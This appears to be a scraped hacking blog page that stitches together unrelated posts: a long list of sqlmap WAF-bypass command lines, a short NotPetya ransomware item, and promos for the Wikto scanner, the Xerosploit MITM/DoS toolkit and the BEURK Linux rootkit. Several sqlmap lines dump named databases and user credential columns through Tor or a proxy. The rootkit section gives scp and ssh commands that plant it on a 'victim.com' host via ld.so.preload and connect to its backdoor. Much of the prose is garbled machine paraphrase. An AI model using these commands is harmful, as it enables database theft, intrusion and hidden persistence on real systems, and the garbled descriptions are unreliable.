2018

sqlmap temper waf bypass method


--level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 --dbs
--dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" --dbs
--dbms="MySQL" -v3 --technique U --tamper="space2comment" --dbs
-v3 --technique=T --no-cast --fresh-queries --banner
sqlmap -u http://www.********?id=1 --level 2 --risk 3 --batch --dbs


-f -b --current-user --current-db --is-dba --users --dbs idcategoria=8

--risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs --     tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

sqlmap -u "http://URL/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1" --technique BT --dbms MYSQL --risk 3 --level 5 -p wpas_keys --tamper space2comment --sql-shell

--risk 3 --level 5 --random-agent --proxy http://123.57.48.140:8080 --dbs

--random-agent --dbms=MYSQL --dbs --technique=B"

--identify-waf --random-agent -v 3 --dbs

1 : --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
2 : --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3

--threads=10 --dbms=MYSQL --tamper=apostrophemask --technique=E -D joomlab -T anz91_session -C session_id --dump

--tables -D miss_db --is-dba --threads="10" --time-sec=10 --timeout=5 --no-cast --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent

sqlmap.py -u http://192.168.0.107/test.php?id=1 -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"

--banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2
-v3 --dbms="MySQL" --risk=3 --level=3 --technique=BU --tamper="space2mysqlblank.py" --random-agent -D damksa_abr -T admin,jobadmin,member --colu

C:\Python27\python.exe sqlmap.py --wizard

--level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql


sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql

sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql


sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql


--level=5 --risk=3 -p "id" –-tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords"

sqlmap -u ‘http://www.site.com:80/search.cmd?form_state=1’ –level=5 –risk=3 -p ‘item1’ –tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords


--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent

--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" --tables

--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" --columns

--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" -C "ud,email,usuario,contra" --dump

tamper=between.py,charencode.py,charunicodeencode.py,equaltolike.py,greatest.py,multiplespaces.py,nonrecursivereplacement.py,percentage.py,randomcase.py,securesphere.py,sp_password.py,space2comment.py,space2dash.py,space2mssqlblank.py,space2mysqldash.py,space2plus.py,space2randomblank.py,unionalltounion.py,unmagicquotes.py --dbms=mssql
The latest splash has been made by the Petya or NotPetya Ransomware that exploded in Ukraine and is infecting companies all over the World. It’s getting some people in deep trouble as there’s no way to recover the files once encrypted.


The malware seems to be trying to hide its intent as it doesn’t really seem to be about making money, $300 is a pretty low amount and they setup a very poor mechanism for collecting the money (the Posteo account they used has been shut down).




At the current value of Bitcoin there’s around $10,000 USD in the wallet mentioned, but with the e-mail address down there’s no way for the victims to get in contact with the bad guys to decrypt their files.
It’s quite probably a nation state attack aimed at the Ukraine, and it just happened to spread outside. It also doesn’t spread over the Internet like WannaCry but only over the local network.
It seems to be using a whole bunch of tech with bits we’ve posted about like Mimikatz and the NSA leak (a modified version of EternalBlue).
It’s definitely some pretty slick coding and an impressive piece of malware. But why it’s been unleashed? We’re unlikely to find out unfortunately.


Wikto is an Open supply (GPL) net server scanner that performs comprehensive tests against net servers for multiple things, as well as over 3500 probably dangerous files/CGIs, versions on over 900 servers, and version specific issues on over 250 servers.                                                  


What is Wikto

Wikto is not a web application scanner. It is wholly unaware of the appliance (if any) that’s running on the net website. So – it'll not search for SQL injection issues, authorization issues etc. on a web site. It is additionally not a network level scanner – therefore it won’t try and notice open ports or see if the net website is correctly firewalled. Wikto rather operates between these 2 levels – it tries to, for instance, find interesting directories and files on the web site, it looks for sample scripts that can be abused or finds famous vulnerabilities within the internet server implementation itself.

How does Wikto work?

To understand the Wikto element of the applying you would like to know what Nikto is. Nikto may be a text based mostly internet server vulnerability scanner written in PERL by the great guys at CIRT. Nikto scans for over 3000 potential issues on an internet server. It is on the far side the scope of the document to clarify what styles of checks it performs – you'll be able to scan all concerning on the Nikto post.Like the BackEnd labourer, the scanner has the ability to perform fuzzy logic on the responses thereby greatly reducing the occurrence of false positives. It additionally has the flexibility to import directories from each the BackEnd labourer and also the Googler.

Wikto vs Nikto

Wikto is not just Nikto for Windows. The Nikto scan is just of its several functions (and it will the Nikto scans wholly totally different than Nikto does).
It additionally has extra practicality together with mathematical logic error code checking, a back-end labourer, Google assisted  directory mining and real time protocol request/response observation.Wikto Web Security Scanner RequirementsTo get the most out of the app you also need to install the following:WinHTTrack – an internet mirroring tool (you will use the default install)HTTprint – an internet server procedure tool (by default, Wikto appearance for this within the c:\Tools directory, however you'll be able to set up it)
You can download Wikto here: https://github.com/sensepost/wikto/




Xerosploit may be a penetration testing toolkit whose goal is to perform man within the middle attacks for testing functions. It brings numerous modules that permit to understand economical attacks, and additionally permits to hold out denial of service attacks and port scanning. power-driven by bettercap and nmap.                                               

                                     

Dependencies



  • nmap
  • hping3
  • build-essential
  • ruby-dev
  • libpcap-dev
  • libgmp3-dev
  • tabulate
  • terminaltables

Instalation

Dependencies will be automatically installed.
git clone https://github.com/LionSec/xerosploit
cd xerosploit && sudo python install.py
sudo xerosploit

features

  • Port scanning
  • Network mapping
  • Dos attack
  • Html code injection
  • Javascript code injection
  • Download intercaption and replacement
  • Sniffing
  • Dns spoofing
  • Background audio reproduction
  • Images replacement
  • Drifnet
  • Webpage defacement and more ...


BEURK is an userland preload rootkit for GNU/Linux, heavily targeted around anti-debugging and anti-detection.



Being a userland rootkit it provides restricted privileges (whatever the user has basically) vs a superuser or root level rootkit.

Features

Hide assailant files and directories

Realtime log cleanup (on utmp/wtmp)
Anti method and login detection
Bypass unhide, lsof, ps, ldd, netstat analysis
Furtive PTY backdoor consumer 

 Usage

 Compile git clone https://github.com/unix-thrust/beurk.git cd beurk
make
Install        scp libselinux.so root@victim.com:/lib/

        ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'

./client.py victim_ip:port # connect with furtive backdoor


Dependencies

The following packages are not required in order to build BEURK at the moment:
  • libpcap – to avoid local sniffing
  • libpam – for local PAM backdoor
  • libssl – for encrypted backdoor connection
You can download BEURK here: https://github.com/unix-thrust/beurk